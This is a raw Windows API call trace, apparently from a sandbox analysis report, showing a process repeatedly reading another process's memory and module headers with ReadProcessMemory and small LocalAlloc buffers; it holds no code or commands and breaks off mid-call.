ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a220, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.057] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.057] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.057] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.057] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118cf8, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.057] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca80000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.057] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.057] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.057] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.057] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca800f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.058] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.058] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.058] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.058] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca800f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.058] LocalFree (hMem=0x4bc170) returned 0x0 [0038.058] LocalFree (hMem=0x4bad20) returned 0x0 [0038.058] LocalFree (hMem=0x4bc150) returned 0x0 [0038.058] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a310, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.058] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.058] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.058] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.059] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x118d98, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.059] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x74df0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.059] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.059] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.059] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.059] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x74df00b8, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.059] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.059] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.059] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.059] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x74df00b8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.060] LocalFree (hMem=0x4bc170) returned 0x0 [0038.060] LocalFree (hMem=0x4bad20) returned 0x0 [0038.060] LocalFree (hMem=0x4bc150) returned 0x0 [0038.060] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a400, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.060] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.060] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.060] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.060] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119018, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.060] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca20000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.060] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.060] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.060] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.061] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca200e8, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.061] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.061] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.061] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.061] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca200e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.061] LocalFree (hMem=0x4bc170) returned 0x0 [0038.061] LocalFree (hMem=0x4bad20) returned 0x0 [0038.061] LocalFree (hMem=0x4bc150) returned 0x0 [0038.061] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a4f0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.061] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.062] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.062] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.062] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119298, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.062] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9f0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.062] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.062] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.062] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.062] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9f00e8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.062] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.062] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.062] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.063] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9f00e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.063] LocalFree (hMem=0x4bc150) returned 0x0 [0038.063] LocalFree (hMem=0x4bad20) returned 0x0 [0038.063] LocalFree (hMem=0x4b8320) returned 0x0 [0038.063] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a5e0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.063] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.063] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.063] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.063] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1192e8, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.063] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefceb0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.063] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.064] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.064] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.064] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefceb00f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.064] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.064] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.064] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.064] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefceb00f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.064] LocalFree (hMem=0x4bc170) returned 0x0 [0038.064] LocalFree (hMem=0x4bad20) returned 0x0 [0038.064] LocalFree (hMem=0x4bc150) returned 0x0 [0038.064] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a6d0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.065] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.065] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.065] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x4b8320 [0038.065] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119338, lpBuffer=0x4b8320, nSize=0x1c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.065] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcf10000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.065] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.065] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.065] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.065] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcf100f0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.065] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.065] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.065] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.065] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcf100f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.066] LocalFree (hMem=0x4bc150) returned 0x0 [0038.066] LocalFree (hMem=0x4bad20) returned 0x0 [0038.066] LocalFree (hMem=0x4b8320) returned 0x0 [0038.066] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a7c0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.066] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.066] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.066] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.066] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119478, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.066] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc930000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.066] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.066] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.066] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.066] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9300f0, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.066] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.067] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.067] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.067] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9300f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.067] LocalFree (hMem=0x4bc150) returned 0x0 [0038.067] LocalFree (hMem=0x4bad20) returned 0x0 [0038.067] LocalFree (hMem=0x4b8320) returned 0x0 [0038.067] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a8b0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.067] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.067] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.067] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.067] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119568, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.067] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc910000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.067] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.067] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.067] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.067] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9100e8, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.068] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.068] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.068] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.068] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9100e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.068] LocalFree (hMem=0x4bc170) returned 0x0 [0038.068] LocalFree (hMem=0x4bad20) returned 0x0 [0038.068] LocalFree (hMem=0x4bc150) returned 0x0 [0038.068] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11a9a0, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.068] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.068] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.068] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.068] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1195b8, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.068] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdf00000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.068] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.069] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.069] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.069] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdf000e0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.069] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.069] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.069] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.069] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdf000e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.069] LocalFree (hMem=0x4bc170) returned 0x0 [0038.069] LocalFree (hMem=0x4bad20) returned 0x0 [0038.069] LocalFree (hMem=0x4bc150) returned 0x0 [0038.069] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11aa90, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.069] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.069] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.069] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4bc150 [0038.069] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x138588, lpBuffer=0x4bc150, nSize=0x10, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.069] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdd80000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.070] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.070] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.070] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.070] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdd800f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.070] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.070] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.070] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.070] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefdd800f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.070] LocalFree (hMem=0x4bc170) returned 0x0 [0038.070] LocalFree (hMem=0x4bad20) returned 0x0 [0038.070] LocalFree (hMem=0x4bc150) returned 0x0 [0038.070] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11ab80, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.070] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.070] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.070] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc150 [0038.071] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119658, lpBuffer=0x4bc150, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.071] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8b0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.071] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.071] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.071] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.071] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8b00e8, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.071] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.071] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.071] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.071] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8b00e8, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.071] LocalFree (hMem=0x4bc170) returned 0x0 [0038.071] LocalFree (hMem=0x4bad20) returned 0x0 [0038.071] LocalFree (hMem=0x4bc150) returned 0x0 [0038.071] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11ac70, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.072] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.122] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.122] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.122] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1196a8, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.123] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8a0000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.123] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.123] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.123] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.123] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8a00f0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.123] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.123] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.123] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.123] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8a00f0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.123] LocalFree (hMem=0x4bc170) returned 0x0 [0038.123] LocalFree (hMem=0x4bad20) returned 0x0 [0038.123] LocalFree (hMem=0x4bc150) returned 0x0 [0038.124] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11ad60, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.124] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.124] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.124] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x4bc150 [0038.124] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x1197e8, lpBuffer=0x4bc150, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc150*, lpNumberOfBytesRead=0x0) returned 1 [0038.124] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc840000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.124] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.124] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.124] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4bc170 [0038.124] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8400e0, lpBuffer=0x4bc170, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bc170*, lpNumberOfBytesRead=0x0) returned 1 [0038.124] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.124] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.124] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x4bad20 [0038.124] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8400e0, lpBuffer=0x4bad20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4bad20*, lpNumberOfBytesRead=0x0) returned 1 [0038.125] LocalFree (hMem=0x4bc170) returned 0x0 [0038.125] LocalFree (hMem=0x4bad20) returned 0x0 [0038.125] LocalFree (hMem=0x4bc150) returned 0x0 [0038.125] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x11ae50, lpBuffer=0x31fa60, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31fa60*, lpNumberOfBytesRead=0x0) returned 1 [0038.125] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.125] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.125] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x4b8320 [0038.125] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x119928, lpBuffer=0x4b8320, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4b8320*, lpNumberOfBytesRead=0x0) returned 1 [0038.125] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc790000, lpBuffer=0x31f930, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x31f930*, lpNumberOfBytesRead=0x0) returned 1 [0038.125] GetModuleHandleW (lpModuleName="kernel32") returned 0x76eb0000 [0038.125] GetProcAddress (hModule=0x76eb0000, lpProcName="LocalAlloc") returned 0x76ec47c0 [0038.125] LocalAlloc (uFlags=0x40, 